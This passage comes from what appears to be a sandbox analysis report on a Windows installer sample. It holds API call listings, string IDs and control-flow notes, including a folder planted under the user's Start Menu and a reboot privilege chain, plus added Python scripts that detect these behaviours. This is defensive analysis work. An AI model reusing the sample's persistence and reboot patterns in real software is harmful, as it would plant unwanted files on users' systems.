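format.

```python
"""Post-process Joe Sandbox 'APIs' listing lines: parse each call and flag the
reboot and clipboard-write sequences seen in the listings above.
Added example, not Joe Sandbox or NSIS code. Constants are documented Win32 values."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample, copied in the shape of the report's listing lines above.
SAMPLE_LISTING = """\
• GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403956
• OpenProcessToken.ADVAPI32(00000000), ref: 0040395D
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403972
• AdjustTokenPrivileges.ADVAPI32 ref: 00403995
• ExitWindowsEx.USER32(00000002,80040002), ref: 004039BA
• OpenClipboard.USER32(00000000), ref: 004058B7
• EmptyClipboard.USER32 ref: 004058BD
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C9
• SetClipboardData.USER32(0000000D,00000000), ref: 00405912
• CloseClipboard.USER32 ref: 00405918
"""

# One listing line: "[• ][Part of subcall function X: ]Api.MODULE[(args)][,] ref: ADDR"
# (assumed shape, matching the lines on this page).
LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[#\w]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Win32 constants from winuser.h and reason.h.
EWX_FLAGS = {0x1: "EWX_SHUTDOWN", 0x2: "EWX_REBOOT", 0x4: "EWX_FORCE",
             0x8: "EWX_POWEROFF", 0x10: "EWX_FORCEIFHUNG"}
SHTDN_REASON = {0x80000000: "SHTDN_REASON_FLAG_PLANNED",
                0x00040000: "SHTDN_REASON_MAJOR_APPLICATION",
                0x00000002: "SHTDN_REASON_MINOR_INSTALLATION"}
CLIPBOARD_FORMATS = {0x1: "CF_TEXT", 0xD: "CF_UNICODETEXT"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: int  # call-site address taken from "ref:"


def as_int(arg: str) -> int | None:
    """Hex argument -> int; '?' and symbolic arguments such as names yield None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def parse_listing(text: str) -> list[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # headers, 'Strings', hashes and other non-call lines
        raw = m.group("args") or ""
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16)))
    return calls


def decode_exit_windows(uflags: int, reason: int) -> tuple[list[str], list[str]]:
    """Name the EWX_* bits and the SHTDN_REASON_* bits of an ExitWindowsEx call."""
    flags = [n for bit, n in EWX_FLAGS.items() if uflags & bit] or ["EWX_LOGOFF"]
    reasons = [n for bit, n in SHTDN_REASON.items() if reason & bit]
    return flags, reasons


def find_reboot_sequence(calls: list[ApiCall]) -> ApiCall | None:
    """ExitWindowsEx reached after LookupPrivilegeValue*(SeShutdownPrivilege)
    and AdjustTokenPrivileges, in listing order; None if the chain is incomplete."""
    got_priv = got_adjust = False
    for c in calls:
        if c.api.startswith("LookupPrivilegeValue") and "SeShutdownPrivilege" in c.args:
            got_priv = True
        elif c.api == "AdjustTokenPrivileges" and got_priv:
            got_adjust = True
        elif c.api == "ExitWindowsEx" and got_adjust:
            return c
    return None


def find_clipboard_write(calls: list[ApiCall]) -> str | None:
    """Clipboard format handed to SetClipboardData (this is a write, not a read)."""
    for c in calls:
        if c.api == "SetClipboardData" and c.args:
            fmt = as_int(c.args[0])
            if fmt is not None:
                return CLIPBOARD_FORMATS.get(fmt, f"format 0x{fmt:X}")
    return None


def analyze(text: str) -> dict:
    calls = parse_listing(text)
    findings: dict = {}
    rb = find_reboot_sequence(calls)
    if rb and len(rb.args) >= 2:
        uflags, reason = as_int(rb.args[0]), as_int(rb.args[1])
        if uflags is not None and reason is not None:
            flags, reasons = decode_exit_windows(uflags, reason)
            findings["reboot"] = {"ref": rb.ref, "flags": flags, "reasons": reasons}
    fmt = find_clipboard_write(calls)
    if fmt:
        findings["clipboard_write"] = fmt
    return findings


if __name__ == "__main__":
    for name, value in analyze(SAMPLE_LISTING).items():
        print(f"{name}: {value}")
```

On the listing above this decodes ExitWindowsEx(00000002, 80040002) as EWX_REBOOT with SHTDN_REASON_FLAG_PLANNED | SHTDN_REASON_MAJOR_APPLICATION | SHTDN_REASON_MINOR_INSTALLATION, i.e. a planned application-initiated reboot, and reports the clipboard write as CF_UNICODETEXT. Feeding it the whole "APIs" section of a report rather than one function's listing is the intended use; the rules key on order within a listing, so keep each function's lines together.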
                                            APIs
                                              • Part of subcall function 7435121B: GlobalAlloc.KERNEL32(00000040,?,7435123B,?,743512DF,00000019,743511BE,-000000A0), ref: 74351225
                                            • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 74351C8D
                                            • lstrcpyW.KERNEL32(00000008,?), ref: 74351CD5
                                            • lstrcpyW.KERNEL32(00000808,?), ref: 74351CDF
                                            • GlobalFree.KERNEL32(00000000), ref: 74351CF2
                                            • GlobalFree.KERNEL32(?), ref: 74351DD4
                                            • GlobalFree.KERNEL32(?), ref: 74351DD9
                                            • GlobalFree.KERNEL32(?), ref: 74351DDE
                                            • GlobalFree.KERNEL32(00000000), ref: 74351FC8
                                            • lstrcpyW.KERNEL32(?,?), ref: 74352182
                                            • GetModuleHandleW.KERNEL32(00000008), ref: 74352201
                                            • LoadLibraryW.KERNEL32(00000008), ref: 74352212
                                            • GetProcAddress.KERNEL32(?,?), ref: 7435226C
                                            • lstrlenW.KERNEL32(00000808), ref: 74352286
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1895645572.0000000074351000.00000020.00000001.01000000.00000005.sdmp, Offset: 74350000, based on PE: true
                                             • Associated: 00000005.00000002.1895373883.0000000074350000.00000002.00000001.01000000.00000005.sdmp
                                             • Associated: 00000005.00000002.1896009053.0000000074354000.00000002.00000001.01000000.00000005.sdmp
                                             • Associated: 00000005.00000002.1896032502.0000000074356000.00000002.00000001.01000000.00000005.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_74350000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                            • String ID:
                                            • API String ID: 245916457-0
                                            • Opcode ID: 4bbf7bcb0e53186155070804e7757c92c8059cbc9f59acf4f5e82077ea10780b
                                            • Instruction ID: 1e7b4f5942fdcb1fa2d70366a0b89cd025e7792d959cbdae9373451a41277746
                                            • Opcode Fuzzy Hash: 4bbf7bcb0e53186155070804e7757c92c8059cbc9f59acf4f5e82077ea10780b
                                            • Instruction Fuzzy Hash: 28226871E04609DADF119FB5C980EEEF7B9FB08315F20462ED1AAE62A0D7B457818F50

                                            Control-flow Graph

                                            control_flow_graph 656 405b00-405b26 call 405dcb 659 405b28-405b3a DeleteFileW 656->659 660 405b3f-405b46 656->660 661 405cbc-405cc0 659->661 662 405b48-405b4a 660->662 663 405b59-405b69 call 4063ee 660->663 664 405b50-405b53 662->664 665 405c6a-405c6f 662->665 669 405b78-405b79 call 405d0f 663->669 670 405b6b-405b76 lstrcatW 663->670 664->663 664->665 665->661 668 405c71-405c74 665->668 671 405c76-405c7c 668->671 672 405c7e-405c86 call 40674c 668->672 673 405b7e-405b82 669->673 670->673 671->661 672->661 679 405c88-405c9c call 405cc3 call 405ab8 672->679 677 405b84-405b8c 673->677 678 405b8e-405b94 lstrcatW 673->678 677->678 680 405b99-405bb5 lstrlenW FindFirstFileW 677->680 678->680 696 405cb4-405cb7 call 405456 679->696 697 405c9e-405ca1 679->697 681 405bbb-405bc3 680->681 682 405c5f-405c63 680->682 684 405be3-405bf7 call 4063ee 681->684 685 405bc5-405bcd 681->685 682->665 687 405c65 682->687 698 405bf9-405c01 684->698 699 405c0e-405c19 call 405ab8 684->699 688 405c42-405c52 FindNextFileW 685->688 689 405bcf-405bd7 685->689 687->665 688->681 695 405c58-405c59 FindClose 688->695 689->684 692 405bd9-405be1 689->692 692->684 692->688 695->682 696->661 697->671 700 405ca3-405cb2 call 405456 call 4061b4 697->700 698->688 701 405c03-405c0c call 405b00 698->701 709 405c3a-405c3d call 405456 699->709 710 405c1b-405c1e 699->710 700->661 701->688 709->688 713 405c20-405c30 call 405456 call 4061b4 710->713 714 405c32-405c38 710->714 713->688 714->688
                                            APIs
                                            • DeleteFileW.KERNELBASE(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405B29
                                            • lstrcatW.KERNEL32(007A3F50,\*.*,007A3F50,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405B71
                                            • lstrcatW.KERNEL32(?,0040A014,?,007A3F50,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405B94
                                            • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F50,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405B9A
                                            • FindFirstFileW.KERNEL32(007A3F50,?,?,?,0040A014,?,007A3F50,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405BAA
                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C4A
                                            • FindClose.KERNEL32(00000000), ref: 00405C59
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                            • String ID: "C:\Users\user\Desktop\Ntwph4urc1.exe"$C:\Users\user~1\AppData\Local\Temp\$P?z$\*.*
                                            • API String ID: 2035342205-424997647
                                            • Opcode ID: 9bcf84aa20197a85572e9300232fccf325a3569ae83ff5500f6c5511c7c60933
                                            • Instruction ID: d176cfcb2707c6ba555092c79fa60715814496245c058da0d6595325efdb1864
                                            • Opcode Fuzzy Hash: 9bcf84aa20197a85572e9300232fccf325a3569ae83ff5500f6c5511c7c60933
                                            • Instruction Fuzzy Hash: BE41D530804A15AAEB216B658D89EBF7678EF42715F14813FF801711D2DB7C5E82CE6E
                                            APIs
                                            • FindFirstFileW.KERNELBASE(771B3420,007A4F98,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,00405E14,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405B20,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 00406757
                                            • FindClose.KERNEL32(00000000), ref: 00406763
                                            Strings
                                            • C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp, xrefs: 0040674C
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Find$CloseFileFirst
                                            • String ID: C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp
                                            • API String ID: 2295610775-3523672939
                                            • Opcode ID: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                            • Instruction ID: 5230d556015edc92dacd95909e5542708b333c59f405b635cf09ddc887f28092
                                            • Opcode Fuzzy Hash: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                            • Instruction Fuzzy Hash: CCD012315192205FC75027386F0C84B7A599F567353264B36F0AAF21E0C6788C3286AC

                                             Control-flow Graph (rendered in the report; the executed/not-executed colouring and the full node and edge list are not reproduced in the text export): function 0x403E6B, the dialog procedure passed to DialogBoxParamW at 0x403D46; basic blocks 0x403E6B to 0x40431A; internal subcalls 0x40140B, 0x401389, 0x403E4C, 0x40431D, 0x404344, 0x404366, 0x404379, 0x404390, 0x4043AB, 0x4063EE, 0x40642B.
                                            APIs
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EA7
                                            • ShowWindow.USER32(?), ref: 00403EC4
                                            • DestroyWindow.USER32 ref: 00403ED8
                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EF4
                                            • GetDlgItem.USER32(?,?), ref: 00403F15
                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F29
                                            • IsWindowEnabled.USER32(00000000), ref: 00403F30
                                            • GetDlgItem.USER32(?,00000001), ref: 00403FDE
                                            • GetDlgItem.USER32(?,00000002), ref: 00403FE8
                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00404002
                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404053
                                            • GetDlgItem.USER32(?,00000003), ref: 004040F9
                                            • ShowWindow.USER32(00000000,?), ref: 0040411A
                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040412C
                                            • EnableWindow.USER32(?,?), ref: 00404147
                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040415D
                                            • EnableMenuItem.USER32(00000000), ref: 00404164
                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040417C
                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040418F
                                            • lstrlenW.KERNEL32(007A1F48,?,007A1F48,00000000), ref: 004041B9
                                            • SetWindowTextW.USER32(?,007A1F48), ref: 004041CD
                                            • ShowWindow.USER32(?,0000000A), ref: 00404301
                                            Memory Dump Source
                                             • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                            • String ID:
                                            • API String ID: 3282139019-0
                                            • Opcode ID: f1a328e51306031731dbcce9d1c3737ebdd7014b04a9a2d8d616989602e21706
                                            • Instruction ID: fd8a01c06953bfbcdc6c7a7ca4fde1a241a6ed83f8ebcdeac2000881ab9a06ac
                                            • Opcode Fuzzy Hash: f1a328e51306031731dbcce9d1c3737ebdd7014b04a9a2d8d616989602e21706
                                            • Instruction Fuzzy Hash: 67C1BFB1604604AFDB206F61ED85D2A3B78EBCA705B10853EF651B11F0CB3D9941DB6E

                                             Control-flow Graph (rendered in the report; the executed/not-executed colouring and the full node and edge list are not reproduced in the text export): function 0x403ABD, the window-setup routine that registers class _Nb, loads the RichEdit control and opens the main dialog; basic blocks 0x403ABD to 0x403D92; internal subcalls 0x40140B, 0x403A0D, 0x403D93, 0x405529, 0x405CC3, 0x405CF0, 0x405D0F, 0x405DCB, 0x4062BC, 0x406335, 0x4063EE, 0x40642B, 0x406773, 0x4067E3.
                                            APIs
                                              • Part of subcall function 004067E3: GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                              • Part of subcall function 004067E3: GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                            • GetUserDefaultUILanguage.KERNELBASE(00000002,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000000), ref: 00403AD7
                                              • Part of subcall function 00406335: wsprintfW.USER32 ref: 00406342
                                            • lstrcatW.KERNEL32(1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000000), ref: 00403B3E
                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,771B3420), ref: 00403BBE
                                            • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000), ref: 00403BD1
                                            • GetFileAttributesW.KERNEL32(Call), ref: 00403BDC
                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires), ref: 00403C25
                                            • RegisterClassW.USER32(007A7A00), ref: 00403C62
                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C7A
                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CAF
                                            • ShowWindow.USER32(00000005,00000000), ref: 00403CE5
                                            • GetClassInfoW.USER32(00000000,RichEdit20W,007A7A00), ref: 00403D11
                                            • GetClassInfoW.USER32(00000000,RichEdit,007A7A00), ref: 00403D1E
                                            • RegisterClassW.USER32(007A7A00), ref: 00403D27
                                            • DialogBoxParamW.USER32(?,00000000,00403E6B,00000000), ref: 00403D46
                                             Memory Dump Source
                                             • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: the same 16 dumps (00400000 to 007C7000 of process 00000005.00000002) listed under Memory Dump Source for the preceding function
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: "C:\Users\user\Desktop\Ntwph4urc1.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                            • API String ID: 606308-2004444479
                                            • Opcode ID: ed5882197ad2af45622ab53baadaf8c7f939305731a510e2915a0577b65485f7
                                            • Instruction ID: 7ce8ec14a48fa11d69b3a5e1f0875b7083b8d607cd9ed6182ea3b60f82ca9994
                                            • Opcode Fuzzy Hash: ed5882197ad2af45622ab53baadaf8c7f939305731a510e2915a0577b65485f7
                                            • Instruction Fuzzy Hash: 286193702407007ED320AB669D46F2B3A7CEB85B49F40853FF941B22E2DB7D99018B6D
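The String ID line above contains a per-user Start Menu path (...\Start Menu\inspires) that also appears as an argument in the LoadImageW and lstrlenW calls, and it is what the report's "Stores files to the Windows start menu directory" signature refers to. The Python check below is an added example, not code from Joe Sandbox, the NSIS project or the sample: it inventories a Start Menu folder and flags anything that is not an ordinary shortcut, including top-level folders other than Programs and .lnk files that lack an MS-SHLLINK header (a renamed executable or script). The set of expected folders and the extension allow-list are assumptions to tune per environment; the demo tree it builds in a temporary directory is constructed, not taken from the sample.

```python
"""
Inventory a per-user Start Menu folder and flag anything that is not an
ordinary shortcut. Added example for the "Stores files to the Windows start
menu directory" behaviour in this report; not code from Joe Sandbox or the sample.
"""
import os
import tempfile
from dataclasses import dataclass
from typing import List

# Assumptions to tune per environment: folders and extensions normally present
# directly under %APPDATA%\Microsoft\Windows\Start Menu.
EXPECTED_TOP_LEVEL_DIRS = {"programs"}
ALLOWED_EXTENSIONS = {".lnk", ".url", ".ini"}        # desktop.ini is legitimate

# MS-SHLLINK header: HeaderSize 0x0000004C followed by the Shell Link CLSID
# 00021401-0000-0000-C000-000000000046 in on-disk (mixed-endian GUID) order.
LNK_HEADER = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")


@dataclass(frozen=True)
class Finding:
    path: str
    reason: str


def looks_like_shell_link(head: bytes) -> bool:
    """True if `head` starts with a valid Shell Link header (first 20 bytes)."""
    return len(head) >= len(LNK_HEADER) and head[:len(LNK_HEADER)] == LNK_HEADER


def audit_start_menu(root: str) -> List[Finding]:
    """Walk `root` and report foreign top-level folders, non-shortcut files and
    .lnk files whose header is not a Shell Link (renamed executables, scripts)."""
    findings: List[Finding] = []
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath == root:                      # os.walk yields the top dir exactly as passed
            for d in dirnames:
                if d.lower() not in EXPECTED_TOP_LEVEL_DIRS:
                    findings.append(Finding(os.path.join(dirpath, d), "unexpected top-level folder"))
        for name in filenames:
            full = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            if ext not in ALLOWED_EXTENSIONS:
                findings.append(Finding(full, f"non-shortcut file ({ext or 'no extension'})"))
            elif ext == ".lnk":
                with open(full, "rb") as fh:
                    if not looks_like_shell_link(fh.read(len(LNK_HEADER))):
                        findings.append(Finding(full, ".lnk without Shell Link header"))
    return findings


def default_start_menu() -> str:
    return os.path.join(os.environ.get("APPDATA", ""), "Microsoft", "Windows", "Start Menu")


def _write(path: str, data: bytes) -> None:
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)


def demo() -> List[Finding]:
    """Build a constructed Start Menu tree in a temporary directory and audit it:
    one clean shortcut, desktop.ini, a foreign folder holding an extension-less
    file, and a fake .lnk that is really a PE image."""
    with tempfile.TemporaryDirectory() as root:
        _write(os.path.join(root, "Programs", "Tool.lnk"), LNK_HEADER + b"\0" * 56)
        _write(os.path.join(root, "desktop.ini"), b"[.ShellClassInfo]\r\n")
        _write(os.path.join(root, "inspires", "payload"), b"\x00" * 16)
        _write(os.path.join(root, "Evil.lnk"), b"MZ" + b"\x90" * 62)
        return audit_start_menu(root)


if __name__ == "__main__":
    target = default_start_menu()
    for f in (audit_start_menu(target) if os.path.isdir(target) else demo()):
        print(f"{f.reason}: {f.path}")
```

On a live host the script audits the current user's Start Menu; anywhere else it runs the constructed demo tree. A hit of the "unexpected top-level folder" kind is exactly the artefact this sample leaves behind, and the header check catches the common trick of parking a non-shortcut there under a .lnk name.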

                                             Control-flow Graph (rendered in the report; the executed/not-executed colouring and the full node and edge list are not reproduced in the text export): function 0x403015, the routine that opens the running executable (GetModuleFileNameW, GetFileSize) and scans it for the installer data block; basic blocks 0x403015 to 0x403249; internal subcalls 0x402FB1, 0x40324C, 0x403444, 0x40345A, 0x405D0F, 0x405E9F, 0x405EE4, 0x4063EE, 0x4068D0.
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00403026
                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Ntwph4urc1.exe,00000400,?,00000007,00000009,0000000B), ref: 00403042
                                              • Part of subcall function 00405EE4: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\Ntwph4urc1.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                              • Part of subcall function 00405EE4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                            • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ntwph4urc1.exe,C:\Users\user\Desktop\Ntwph4urc1.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 0040308E
                                            • GlobalAlloc.KERNELBASE(00000040,0000000B,?,00000007,00000009,0000000B), ref: 004031C4
                                             Memory Dump Source
                                             • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: the same 16 dumps (00400000 to 007C7000 of process 00000005.00000002) listed under Memory Dump Source for the function at 0x403E6B above
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                            • String ID: "C:\Users\user\Desktop\Ntwph4urc1.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Ntwph4urc1.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                            • API String ID: 2803837635-3862075386
                                            • Opcode ID: f652378745d43b93c2f3ffccbc25efe865f8bfd62d9be5f828775b6231d1a4cb
                                            • Instruction ID: b65d07b499067b34cf8ea267e223a71d0fae98adc47698ec1498b1efb03bef53
                                            • Opcode Fuzzy Hash: f652378745d43b93c2f3ffccbc25efe865f8bfd62d9be5f828775b6231d1a4cb
